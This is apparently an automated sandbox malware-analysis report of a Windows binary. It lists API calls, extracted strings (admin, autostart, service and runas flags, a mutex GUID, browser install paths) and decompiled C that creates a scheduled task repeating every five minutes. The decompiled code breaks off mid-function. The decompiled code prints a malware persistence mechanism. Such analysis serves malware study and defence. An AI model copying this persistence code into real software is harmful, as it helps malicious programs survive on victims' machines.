0x0041aa76
0x0041aa76
0x0041aa7b
0x0041aa7b
0x0041aa7d
0x0041aa61
0x0041aa61
0x0041aa61
0x0041aa7f
0x0041aa8b
0x0041aa9b
0x0041aaa0
0x0041aaa4
0x0041aaa7
0x0041aab2
0x0041aab2
0x0041aab4
0x0041aabf
0x0041aac7
0x0041aac7
0x0041aaca
0x0041aacd
0x0041aad3
0x0041aad5
0x0041aad8
0x0041aad8
0x0041aada
0x0041aadb
0x0041aadb
0x0041aadf
0x0041aadf
0x0041aacf
0x0041aacf
0x0041aacf
0x0041aae1
0x0041aaea
0x0041aaef
0x0041aaf0
0x0041aaf0
0x0041aaf5
0x0041aaff
0x0041ab03
0x0041ab05
0x0041ab07
0x0041ab0e
0x0041ab16
0x0041ab18
0x0041ab2c
0x0041ab2e
0x0041ab34
0x0041ab37
0x0041ab39
0x0041ab3b
0x0041ab3f
0x0041ab43
0x0041ab48
0x0041ab48
0x0041ab4d
0x0041ab54
0x0041ab5b
0x0041ab5e
0x0041ab62
0x0041ab7b
0x0041ab7d
0x0041ab64
0x0041ab67
0x0041ab67
0x0041ab68
0x0041ab6f
0x0041ab74
0x0041ab74
0x0041ab68
0x0041ab86
0x0041ab8c
0x0041ab8f
0x0041ab91
0x0041ab98
0x0041ab9f
0x0041ab9f
0x0041aba2
0x0041aba7
0x0041abad
0x0041abb2
0x0041abb2
0x0041abc0
0x0041abc5
0x0041abc9
0x0041abcc
0x0041abd7
0x0041abd7
0x0041abd9
0x0041abe4
0x0041abf0
0x0041abf0
0x0041abf3
0x0041abf6
0x0041abfc
0x0041abfe
0x0041ac01
0x0041ac01
0x0041ac03
0x0041ac04
0x0041ac04
0x0041ac08
0x0041ac08
0x0041abf8
0x0041abf8
0x0041abf8
0x0041ac0a
0x0041ac13
0x0041ac18
0x0041ac19
0x0041ac19
0x0041ac1e
0x0041ac28
0x0041ac2c
0x0041ac2e
0x0041ac30
0x0041ac37
0x0041ac3f
0x0041ac41
0x0041ac55
0x0041ac57
0x0041ac5d
0x0041ac60
0x0041ac62
0x0041ac64
0x0041ac68
0x0041ac6c
0x0041ac71
0x0041ac71
0x0041ac76
0x0041ac7d
0x0041ac84
0x0041ac87
0x0041ac8b
0x0041aca4
0x0041aca6
0x0041ac8d
0x0041ac90
0x0041ac90
0x0041ac91
0x0041ac98
0x0041ac9d
0x0041ac9d
0x0041ac91
0x0041acaf
0x0041acb5
0x0041acb8
0x0041acba
0x0041acc1
0x0041acc8
0x0041acc8
0x0041accb
0x0041acd0
0x0041acd6
0x0041acdb
0x0041acdb
0x0041ace9
0x0041acee
0x0041acf2
0x0041acf5
0x0041ad00
0x0041ad00
0x0041ad02
0x0041ad0d
0x0041ad15
0x0041ad15
0x0041ad18
0x0041ad1b
0x0041ad21
0x0041ad23
0x0041ad26
0x0041ad26
0x0041ad28
0x0041ad29
0x0041ad29
0x0041ad2d
0x0041ad2d
0x0041ad1d
0x0041ad1d
0x0041ad1d
0x0041ad2f
0x0041ad38
0x0041ad3d
0x0041ad3e
0x0041ad3e
0x0041ad43
0x0041ad4d
0x0041ad51
0x0041ad53
0x0041ad55
0x0041ad5c
0x0041ad64
0x0041ad66
0x0041ad71
0x0041ad76
0x0041ad7a
0x0041ad7c
0x0041ad7f
0x0041ad85
0x0041ad87
0x0041ad89
0x0041ad8d
0x0041ad91
0x0041ad96
0x0041ad96
0x0041ad9b
0x0041ada2
0x0041ada9
0x0041adac
0x0041adb0
0x0041adc9
0x0041adcb
0x0041adb2
0x0041adb5
0x0041adb5
0x0041adb6
0x0041adbd
0x0041adc2
0x0041adc2
0x0041adb6
0x0041add4
0x0041adda
0x0041addd
0x0041addf
0x0041ade6
0x0041aded
0x0041aded
0x0041adf0
0x0041adf5
0x0041adfb
0x0041ae00
0x0041ae00
0x0041ae03
0x0041ae07
0x0041ae18
0x0041ae20
0x0041ae25
0x0041ae2e
0x0041ae37
0x0041ae3c
0x0041ae41
0x0041ae47
0x0041ae4c
0x0041ae4c
0x0041ae4f
0x0041ae53
0x0041ae64
0x0041ae6c
0x0041ae71
0x0041ae7d
0x0041ae82
0x0041ae87
0x0041ae8d
0x0041ae92
0x0041ae92
0x0041ae95
0x0041ae99
0x0041aeaa
0x0041aeb2
0x0041aeb7
0x0041aec3
0x0041aec8
0x0041aecd
0x0041aed3
0x0041aed8
0x0041aed8
0x0041aedb
0x0041aedf
0x0041aef0
0x0041aef8
0x0041aefd
0x0041af09
0x0041af0e
0x0041af13
0x0041af19
0x0041af1e
0x0041af1e
0x0041af21
0x0041af25
0x0041af36
0x0041af3e
0x0041af43
0x0041af4f
0x0041af54
0x0041af59
0x0041af5f
0x0041af64
0x0041af64
0x0041af67
0x0041af6b
0x0041af7c
0x0041af84
0x0041af89
0x0041af95
0x0041af9a
0x0041af9f
0x0041afa5
0x0041afaa
0x0041afaa
0x0041afad
0x0041afb1
0x0041afc2
0x0041afca
0x0041afcf
0x0041afdb
0x0041afe0
0x0041afe5
0x0041afeb
0x0041aff0
0x0041aff0
0x0041affc
0x0041b00e
0x0041b01a
0x0041b020
0x0041b029
0x0041b037
0x0041b045
0x0041b04c
0x0041b04c
0x0041b054
0x0041b05d
0x0041b06b
0x0041b077
0x0041b080
0x0041b08e
0x0041b09a
0x0041b0a3
0x0041b0b1
0x0041b0bd
0x0041b0c6
0x0041b0d4
0x0041b0e0
0x0041b0e9
0x0041b0f7
0x0041b103
0x0041b10c
0x0041b111
0x0041b111
0x0041b11b
0x0041b120
0x0041b124
0x0041b12b
0x0041b130
0x0041b136
0x0041b13f
0x0041b13f
0x0041b150
0x0041b159
0x0041b169
0x0041b16e
0x0041b178
0x0041b17d
0x0041b181
0x0041b190
0x0041b19a
0x0041b19f
0x0041b1a0
0x0041b1a0
0x0041b1a9
0x0041b1ba
0x0041b1c4
0x0041b1c9
0x0041b1d3
0x0041b1d8
0x0041b1e5
0x0041b1ee
0x0041b1f3
0x0041b20a
0x0041b21d
0x0041b222
0x0041b224
0x0041b230
0x0041b23b
0x0041b240
0x0041b246
0x0041b251
0x0041b259
0x0041b260
0x0041b269
0x0041b27d
0x0041b28c
0x0041b291
0x0041b297
0x0041b299
0x0041b29f
0x0041b2af
0x0041b2b4
0x0041b2bb
0x0041b2c7
0x0041b2d0
0x0041b2e8
0x0041b2ed
0x0041b2ed
0x0041b230
0x0041b2fd
0x0041b303
0x0041b30c
0x0041b314
0x0041b31d
0x0041b322
0x0041b336
0x0041b33e
0x0041b346
0x0041b34b
0x0041b34d
0x0041b35f
0x0041b369
0x0041b36b
0x0041b374
0x0041b389
0x0041b392
0x0041b3a0
0x0041b3ae
0x0041b3b7
0x0041b3c5
0x0041b3dd
0x0041b3e2
0x0041b3e4
0x0041b3ea
0x0041b3f0
0x0041b3fa
0x0041b40c
0x0041b418
0x0041b41d
0x0041b422
0x0041b428
0x0041b42d
0x0041b43d
0x0041b443
0x0041b449
0x0041b44f
0x0041b45d
0x0041b466
0x0041b47e
0x0041b483
0x0041b483
0x0041b3f0
0x0041b495
0x0041b49a
0x0041b4b3
0x0041b4bb
0x0041b4bd
0x0041b4c5
0x0041b4cd
0x0041b4d7
0x0041b4e7
0x0041b4e9
0x0041b4e9
0x0041b4c5
0x0041b4ed
0x0041b4fe
0x0041b500
0x0041b509
0x0041b510
0x0041b520
0x0041b522
0x0041b524
0x0041b526
0x0041b52e
0x0041b540
0x0041b542
0x0041b542
0x0041b526
0x0041b54e
0x0041b554
0x0041b554
0x0041b510
0x0041b55b
0x0041b560
0x0041b562
0x0041b56b
0x0041b570
0x0041b580
0x0041b582
0x0041b584
0x0041b586
0x0041b58e
0x0041b5a0
0x0041b5a2
0x0041b5a2
0x0041b586
0x0041b5ae
0x0041b5b4
0x0041b5b4
0x0041b570
0x0041b5bb
0x0041b5c2
0x0041b5c7
0x0041b5c9
0x0041b5c9
0x0041b5ce
0x0041b5d0
0x0041b5d3
0x0041b5d3
0x0041b5d9
0x0041b5e4
0x0041b34f
0x0041b34f
0x0041b34f
0x0041b5ed
0x0041b5f9
0x0041b605
0x0041b611
0x0041b61d
0x0041a9d1
0x0041a9d1
0x0041a9d1
0x0041b629
0x0041a624
0x0041a624
0x0041a62a
0x0041a62c
0x00000000
0x0041a632
0x0041a63f
0x0041a652
0x0041a661
0x0041a66f
0x0041a67b
0x0041a686
0x0041a68d
0x0041a697
0x0041a6a2
0x0041a6a9
0x0041a6ac
0x0041a6b0
0x0041a6b2
0x0041a6b2
0x0041a6b4
0x0041a6c3
0x0041a6ce
0x0041a6d9
0x0041a6df
0x0041a6e1
0x0041a6fe
0x0041a6fe
0x00000000
0x0041a6e3
0x0041a6e3
0x0041a6e3
0x0041a6e1
0x0041a62c
0x0041a61e
0x0041a612
0x0041a60a
0x0041b635
0x0041b641
0x0041b64d
0x0041b659
0x0041b666
0x0041a466
0x0041a46d
0x0041a46f
0x0041a47c
0x0041a47c
0x0041a196
0x0041a196
0x0041a19d
0x0041a1a1
0x0041a1a7
0x0041a1b4
0x0041a1bc
0x0041a1c1
0x0041a1c4
0x0041a1c6
0x0041a1ca
0x00000000
0x00000000
0x0041a1df
0x0041a1eb
0x0041a1f3
0x0041a201
0x0041a20b
0x0041a20e
0x0041a217
0x0041a21a
0x0041a21f
0x0041a222
0x0041a226
0x0041a323
0x0041a323
0x0041a328
0x0041a32c
0x0041a32f
0x0041a333
0x0041a337
0x0041a1b0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a22e
0x0041a236
0x0041a23b
0x0041a23e
0x0041a240
0x0041a244
0x0041a2d5
0x0041a2da
0x0041a2dd
0x0041a2df
0x0041a2f4
0x0041a2f9
0x0041a2fc
0x0041a2fe
0x0041a313
0x0041a318
0x0041a31b
0x0041a31d
0x0041a361
0x0041a371
0x0041a373
0x0041a380
0x0041a38f
0x0041a395
0x0041a3a3
0x0041a3a5
0x0041a3a7
0x00000000
0x00000000
0x0041a3af
0x0041a3b8
0x0041a3c7
0x0041a3c9
0x00000000
0x0041a3cb
0x0041a3cb
0x0041a3d0
0x0041a3d2
0x0041a3e3
0x0041a3f0
0x0041a3f2
0x0041a3ff
0x0041a3d4
0x0041a3d6
0x0041a3dc
0x00000000
0x0041a3dc
0x0041a3d2
0x00000000
0x0041a3c9
0x0041a406
0x0041a40e
0x0041a41b
0x0041a41d
0x0041a42b
0x0041a436
0x0041a43d
0x0041a44a
0x0041a44c
0x0041a459
0x00000000
0x00000000
0x00000000
0x0041a300
0x0041a300
0x00000000
0x0041a300
0x0041a2e1
0x0041a2e1
0x0041a31f
0x0041a31f
0x00000000
0x0041a31f
0x0041a24a
0x0041a24e
0x0041a25a
0x0041a267
0x0041a282
0x0041a28c
0x0041a293
0x0041a2a8
0x0041a2b2
0x0041a2b9
0x0041a2be
0x0041a2c1
0x0041a2c4
0x0041a2c8
0x00000000
0x0041a2c8
0x00000000
0x0041a244
0x0041a1b4
0x0041a190
0x0041a05f
0x00419fb4
0x00419fb4
0x00419fc1
0x00419fc1
0x00000000

APIs

Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6

GetCurrentProcess.KERNEL32 ref: 00419FC4
GetLastError.KERNEL32 ref: 00419FD2
SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
GetLastError.KERNEL32 ref: 00419FE4
GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,0082CE58,?), ref: 0041A0BB
PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
GetCommandLineW.KERNEL32(?,?), ref: 0041A161

Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C

Strings

<, xrefs: 0041A67B
IsTask, xrefs: 0041A1EE, 0041A299
IsAutoStart, xrefs: 0041A1D0, 0041A273
D:\Program Files (x86)\Internet Explorer\, xrefs: 0041B062
7P, xrefs: 0041B164
C:\Windows\, xrefs: 0041AE0F
C:\Program Files (x86)\Mozilla Firefox\, xrefs: 0041AE5B
x2Q, xrefs: 0041A856
D:\Program Files (x86)\Mozilla Firefox\, xrefs: 0041B02E
IsNotTask, xrefs: 0041A654
runas, xrefs: 0041A6CE
{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}, xrefs: 0041A8A0
I:\5d2860c89d774.jpg, xrefs: 0041B32F
--Task, xrefs: 0041A2CD
F:\, xrefs: 0041B397
--Service, xrefs: 0041A30B
list<T> too long, xrefs: 0041B669, 0041B673
C:\Program Files (x86)\Internet Explorer\, xrefs: 0041AEA1
D:\Windows\, xrefs: 0041AFF3
--Admin, xrefs: 0041A1B4, 0041A632
D:\Program Files\Google\, xrefs: 0041B0EE
--AutoStart, xrefs: 0041A2EC
x*P, xrefs: 0041ACE4
C:\Program Files\Internet Explorer\, xrefs: 0041AF73
C:\Program Files (x86)\Google\, xrefs: 0041AEE7
{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}, xrefs: 0041A8B6
IsNotAutoStart, xrefs: 0041A645
D:\Program Files\Mozilla Firefox\, xrefs: 0041B0A8
D:\Program Files (x86)\Google\, xrefs: 0041B085
X1P, xrefs: 0041A485
%username%, xrefs: 0041B283
C:\Program Files\Mozilla Firefox\, xrefs: 0041AF2D
D:\Program Files\Internet Explorer\, xrefs: 0041B0CB
--ForNetRes, xrefs: 0041A22E
C:\Program Files\Google\, xrefs: 0041AFB9

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
API String ID: 2957410896-3144399390
Opcode ID: 5654f1f0d8902897548b635c0c3de12d41863b9e7f9f148f59327b5af1546f90
Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
Opcode Fuzzy Hash: 5654f1f0d8902897548b635c0c3de12d41863b9e7f9f148f59327b5af1546f90
Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 0040D240 Relevance: 56.7, APIs: 24, Strings: 8, Instructions: 702
comCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E0040D240(void* __ecx, char _a4, intOrPtr _a24) {
				char _v8;
				intOrPtr _v16;
				void* _v20;
				void* _v24;
				char _v28;
				void* _v32;
				char _v33;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				void* _v72;
				void* _v76;
				void* _v80;
				char _v92;
				void* _v96;
				char _v100;
				char _v104;
				short _v120;
				char _v140;
				char _v156;
				char _v172;
				char _v228;
				char _v244;
				char _v324;
				long _v1348;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t222;
				short _t226;
				short _t243;
				intOrPtr* _t248;
				intOrPtr* _t249;
				intOrPtr* _t250;
				short _t251;
				intOrPtr* _t253;
				intOrPtr* _t254;
				intOrPtr* _t255;
				intOrPtr* _t258;
				short _t259;
				intOrPtr* _t261;
				intOrPtr* _t263;
				intOrPtr* _t265;
				intOrPtr* _t267;
				intOrPtr* _t268;
				intOrPtr* _t269;
				short _t270;
				intOrPtr* _t273;
				short _t274;
				intOrPtr* _t275;
				short _t276;
				intOrPtr* _t278;
				short _t279;
				intOrPtr* _t280;
				short _t281;
				intOrPtr* _t283;
				intOrPtr* _t285;
				intOrPtr* _t286;
				intOrPtr* _t287;
				short _t288;
				intOrPtr* _t291;
				short _t292;
				intOrPtr* _t293;
				short _t294;
				intOrPtr* _t296;
				short _t297;
				intOrPtr* _t299;
				intOrPtr* _t301;
				intOrPtr* _t302;
				intOrPtr* _t303;
				short _t304;
				intOrPtr* _t306;
				intOrPtr* _t307;
				intOrPtr* _t308;
				short _t309;
				intOrPtr* _t311;
				intOrPtr* _t313;
				intOrPtr* _t314;
				intOrPtr* _t315;
				short _t316;
				intOrPtr* _t318;
				intOrPtr* _t319;
				intOrPtr* _t320;
				short _t321;
				void* _t327;
				intOrPtr* _t332;
				intOrPtr* _t333;
				intOrPtr* _t334;
				intOrPtr* _t335;
				short _t336;
				intOrPtr* _t340;
				short _t341;
				intOrPtr* _t342;
				short _t343;
				intOrPtr* _t345;
				short _t346;
				intOrPtr* _t350;
				intOrPtr* _t351;
				short _t352;
				intOrPtr* _t354;
				intOrPtr* _t355;
				intOrPtr* _t356;
				short _t357;
				intOrPtr* _t365;
				intOrPtr* _t378;
				intOrPtr* _t380;
				intOrPtr* _t382;
				intOrPtr* _t386;
				intOrPtr* _t388;
				intOrPtr* _t390;
				intOrPtr* _t392;
				void* _t394;
				char _t395;
				intOrPtr* _t397;
				intOrPtr* _t398;
				intOrPtr* _t402;
				intOrPtr* _t410;
				intOrPtr* _t417;
				intOrPtr* _t420;
				intOrPtr* _t423;
				intOrPtr* _t428;
				intOrPtr* _t431;
				intOrPtr* _t433;
				intOrPtr* _t454;
				intOrPtr* _t457;
				intOrPtr* _t459;
				intOrPtr* _t466;
				intOrPtr* _t469;
				short _t479;
				short _t480;
				short _t484;
				short _t491;
				short _t499;
				short _t500;
				short _t501;
				short _t502;
				short _t504;
				intOrPtr* _t511;
				short _t512;
				short _t513;
				void* _t516;
				void* _t517;
				void* _t519;
				intOrPtr* _t540;
				short _t541;
				short _t542;
				intOrPtr _t543;
				void* _t544;

				_t222 =  *[fs:0x0];
				 *[fs:0x0] = _t543;
				_t544 = _t543 - 0x538;
				_t517 = __ecx;
				_v8 = 0;
				__imp__CoInitialize(0, _t516, _t519, _t394, _t222, 0x4ca928, 0xffffffff); // executed
				if(_t222 >= 0) {
					__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 6, 3, 0, 0, 0); // executed
					_v100 = 7;
					_v120 = 0;
					_v104 = 0;
					E00414690(_t394,  &_v120,  &_a4);
					_t226 =  &_v32;
					_v8 = 1;
					_v32 = 0;
					__imp__CoCreateInstance(0x4d506c, 0, 1, 0x4d4fec, _t226, 0, 0xffffffff); // executed
					__eflags = _t226;
					if(_t226 < 0) {
						L74:
						__imp__CoUninitialize();
						_t395 = 0;
					} else {
						_t397 = __imp__#8;
						 *_t397( &_v156);
						asm("movdqu xmm0, [ebp-0x98]");
						asm("movdqu [ebp-0xb8], xmm0");
						 *_t397( &_v140);
						asm("movdqu xmm0, [ebp-0x88]");
						asm("movdqu [ebp-0xc8], xmm0");
						 *_t397( &_v172);
						asm("movdqu xmm0, [ebp-0xa8]");
						asm("movdqu [ebp-0xd8], xmm0");
						 *_t397( &_v244);
						_v8 = 5;
						asm("movdqu xmm0, [ebp-0xb8]");
						_t402 = _v32;
						asm("movdqu [eax], xmm0");
						asm("movdqu xmm0, [ebp-0xc8]");
						asm("movdqu [eax], xmm0");
						_t544 = _t544 - 0xffffffffffffffe0;
						asm("movdqu xmm0, [ebp-0xd8]");
						asm("movdqu [eax], xmm0");
						asm("movdqu xmm0, [ebp-0xf0]");
						asm("movdqu [eax], xmm0"); // executed
						_t243 =  *((intOrPtr*)( *_t402 + 0x28))(_t402);
						__imp__#9( &_v244);
						__imp__#9( &_v172);
						__imp__#9( &_v140);
						_v8 = 1;
						__imp__#9( &_v156);
						__eflags = _t243;
						if(__eflags >= 0) {
							_v24 = 0;
							_t248 = E0040B140(_t397,  &_v28, __eflags, "\\");
							_v8 = 6;
							_t249 =  *_t248;
							__eflags = _t249;
							if(_t249 == 0) {
								_t479 = 0;
								__eflags = 0;
							} else {
								_t479 =  *_t249;
							}
							_t250 = _v32;
							_t251 =  *((intOrPtr*)( *_t250 + 0x1c))(_t250, _t479,  &_v24);
							_v8 = 1;
							E0040B1D0( &_v28, _t479);
							__eflags = _t251;
							if(__eflags >= 0) {
								_t253 = E0040B140(_t397,  &_v28, __eflags, L"Time Trigger Task");
								_v8 = 7;
								_t254 =  *_t253;
								__eflags = _t254;
								if(_t254 == 0) {
									_t480 = 0;
									__eflags = 0;
								} else {
									_t480 =  *_t254;
								}
								_t255 = _v24;
								 *((intOrPtr*)( *_t255 + 0x3c))(_t255, _t480, 0);
								_v8 = 1;
								E0040B1D0( &_v28, _t480);
								_t258 = _v32;
								_v20 = 0;
								_t259 =  *((intOrPtr*)( *_t258 + 0x24))(_t258, 0,  &_v20);
								_t410 = _v32;
								 *((intOrPtr*)( *_t410 + 8))(_t410);
								__eflags = _t259;
								if(_t259 >= 0) {
									_t261 = _v20;
									_v64 = 0;
									__eflags =  *((intOrPtr*)( *_t261 + 0x1c))(_t261,  &_v64);
									if(__eflags < 0) {
										L73:
										_t263 = _v24;
										 *((intOrPtr*)( *_t263 + 8))(_t263);
										_t265 = _v20;
										 *((intOrPtr*)( *_t265 + 8))(_t265);
										goto L74;
									} else {
										_t267 = E0040B140(_t397,  &_v28, __eflags, L"Author Name");
										_v8 = 8;
										_t268 =  *_t267;
										__eflags = _t268;
										if(_t268 == 0) {
											_t484 = 0;
											__eflags = 0;
										} else {
											_t484 =  *_t268;
										}
										_t269 = _v64;
										_t270 =  *((intOrPtr*)( *_t269 + 0x28))(_t269, _t484);
										_v8 = 1;
										E0040B1D0( &_v28, _t484);
										_t417 = _v64;
										 *((intOrPtr*)( *_t417 + 8))(_t417);
										__eflags = _t270;
										if(_t270 < 0) {
											goto L73;
										} else {
											_t273 = _v20;
											_v56 = 0;
											_t274 =  *((intOrPtr*)( *_t273 + 0x3c))(_t273,  &_v56);
											__eflags = _t274;
											if(_t274 < 0) {
												goto L73;
											} else {
												_t275 = _v56;
												_t276 =  *((intOrPtr*)( *_t275 + 0x38))(_t275, 3);
												_t420 = _v56;
												 *((intOrPtr*)( *_t420 + 8))(_t420);
												__eflags = _t276;
												if(_t276 < 0) {
													goto L73;
												} else {
													_t278 = _v20;
													_v48 = 0;
													_t279 =  *((intOrPtr*)( *_t278 + 0x2c))(_t278,  &_v48);
													__eflags = _t279;
													if(_t279 < 0) {
														goto L73;
													} else {
														_t280 = _v48;
														_t281 =  *((intOrPtr*)( *_t280 + 0x58))(_t280, 0xffffffff);
														_t423 = _v48;
														 *((intOrPtr*)( *_t423 + 8))(_t423);
														__eflags = _t281;
														if(_t281 < 0) {
															goto L73;
														} else {
															_t283 = _v48;
															_v76 = 0;
															__eflags =  *((intOrPtr*)( *_t283 + 0x9c))(_t283,  &_v76);
															if(__eflags < 0) {
																goto L73;
															} else {
																_t285 = E0040B140(_t397,  &_v28, __eflags, L"PT5M");
																_v8 = 9;
																_t286 =  *_t285;
																__eflags = _t286;
																if(_t286 == 0) {
																	_t491 = 0;
																	__eflags = 0;
																} else {
																	_t491 =  *_t286;
																}
																_t287 = _v76;
																_t288 =  *((intOrPtr*)( *_t287 + 0x28))(_t287, _t491);
																_v8 = 1;
																E0040B1D0( &_v28, _t491);
																_t428 = _v76;
																 *((intOrPtr*)( *_t428 + 8))(_t428);
																__eflags = _t288;
																if(_t288 < 0) {
																	goto L73;
																} else {
																	_t291 = _v20;
																	_v80 = 0;
																	_t292 =  *((intOrPtr*)( *_t291 + 0x24))(_t291,  &_v80);
																	__eflags = _t292;
																	if(_t292 < 0) {
																		goto L73;
																	} else {
																		_t293 = _v80;
																		_v68 = 0;
																		_t294 =  *((intOrPtr*)( *_t293 + 0x28))(_t293, 1,  &_v68);
																		_t431 = _v80;
																		 *((intOrPtr*)( *_t431 + 8))(_t431);
																		__eflags = _t294;
																		if(_t294 < 0) {
																			goto L73;
																		} else {
																			_t296 = _v68;
																			_v40 = 0;
																			_t297 =  *((intOrPtr*)( *_t296))(_t296, 0x4d50ec,  &_v40);
																			_t433 = _v68;
																			 *((intOrPtr*)( *_t433 + 8))(_t433);
																			__eflags = _t297;
																			if(_t297 < 0) {
																				goto L73;
																			} else {
																				_t299 = _v40;
																				__eflags =  *((intOrPtr*)( *_t299 + 0x28))(_t299,  &_v60);
																				if(__eflags < 0) {
																					goto L73;
																				} else {
																					_t301 = E0040B140(_t397,  &_v28, __eflags, L"PT5M");
																					_v8 = 0xa;
																					_t302 =  *_t301;
																					__eflags = _t302;
																					if(_t302 == 0) {
																						_t499 = 0;
																						__eflags = 0;
																					} else {
																						_t499 =  *_t302;
																					}
																					_t303 = _v60;
																					_t304 =  *((intOrPtr*)( *_t303 + 0x20))(_t303, _t499);
																					_v8 = 1;
																					E0040B1D0( &_v28, _t499);
																					__eflags = _t304;
																					if(__eflags < 0) {
																						goto L73;
																					} else {
																						_t306 = E0040B140(_t397,  &_v28, __eflags, 0x500078);
																						_v8 = 0xb;
																						_t307 =  *_t306;
																						__eflags = _t307;
																						if(_t307 == 0) {
																							_t500 = 0;
																							__eflags = 0;
																						} else {
																							_t500 =  *_t307;
																						}
																						_t308 = _v60;
																						_t309 =  *((intOrPtr*)( *_t308 + 0x28))(_t308, _t500);
																						_v8 = 1;
																						E0040B1D0( &_v28, _t500);
																						__eflags = _t309;
																						if(_t309 < 0) {
																							goto L73;
																						} else {
																							_t311 = _v40;
																							__eflags =  *((intOrPtr*)( *_t311 + 0x2c))(_t311, _v60);
																							if(__eflags < 0) {
																								goto L73;
																							} else {
																								_t313 = E0040B140(_t397,  &_v28, __eflags, L"Trigger1");
																								_v8 = 0xc;
																								_t314 =  *_t313;
																								__eflags = _t314;
																								if(_t314 == 0) {
																									_t501 = 0;
																									__eflags = 0;
																								} else {
																									_t501 =  *_t314;
																								}
																								_t315 = _v40;
																								_t316 =  *((intOrPtr*)( *_t315 + 0x24))(_t315, _t501);
																								_v8 = 1;
																								E0040B1D0( &_v28, _t501);
																								__eflags = _t316;
																								if(__eflags < 0) {
																									goto L73;
																								} else {
																									_t318 = E0040B140(_t397,  &_v28, __eflags, L"2030-05-02T08:00:00");
																									_v8 = 0xd;
																									_t319 =  *_t318;
																									__eflags = _t319;
																									if(_t319 == 0) {
																										_t502 = 0;
																										__eflags = 0;
																									} else {
																										_t502 =  *_t319;
																									}
																									_t320 = _v40;
																									_t321 =  *((intOrPtr*)( *_t320 + 0x44))(_t320, _t502);
																									_v8 = 1;
																									E0040B1D0( &_v28, _t502);
																									__eflags = _t321;
																									if(__eflags < 0) {
																										goto L73;
																									} else {
																										E00423AAF( &_v28, _t502, __eflags,  &_v92);
																										asm("cdq");
																										_v92 = _v92 + _t517;
																										asm("adc [ebp-0x54], edx"); // executed
																										_t327 = E00423551( &_v92); // executed
																										E004228E0( &_v324, 0x50, "%Y-%m-%dT%H:%M:%S", _t327);
																										_v33 = 0;
																										E00412C40(_t544, _t517,  &_v324);
																										_t332 = E00412900( &_v228, _v33);
																										_t544 = _t544 + 0x18;
																										_v8 = 0xe;
																										__eflags =  *((intOrPtr*)(_t332 + 0x14)) - 8;
																										if(__eflags >= 0) {
																											_t332 =  *_t332;
																										}
																										_t333 = E0040B140(_t397,  &_v28, __eflags, _t332);
																										_v8 = 0xf;
																										_t334 =  *_t333;
																										__eflags = _t334;
																										if(_t334 == 0) {
																											_t504 = 0;
																											__eflags = 0;
																										} else {
																											_t504 =  *_t334;
																										}
																										_t335 = _v40;
																										_t336 =  *((intOrPtr*)( *_t335 + 0x3c))(_t335, _t504);
																										E0040B1D0( &_v28, _t504);
																										_v8 = 1;
																										E00413210( &_v228);
																										_t454 = _v40;
																										 *((intOrPtr*)( *_t454 + 8))(_t454);
																										__eflags = _t336;
																										if(_t336 < 0) {
																											goto L73;
																										} else {
																											_t340 = _v20;
																											_v52 = 0;
																											_t341 =  *((intOrPtr*)( *_t340 + 0x44))(_t340,  &_v52);
																											__eflags = _t341;
																											if(_t341 < 0) {
																												goto L73;
																											} else {
																												_t342 = _v52;
																												_v72 = 0;
																												_t343 =  *((intOrPtr*)( *_t342 + 0x30))(_t342, 0,  &_v72);
																												_t457 = _v52;
																												 *((intOrPtr*)( *_t457 + 8))(_t457);
																												__eflags = _t343;
																												if(_t343 < 0) {
																													goto L73;
																												} else {
																													_t345 = _v72;
																													_v44 = 0;
																													_t346 =  *((intOrPtr*)( *_t345))(_t345, 0x4d511c,  &_v44);
																													_t459 = _v72;
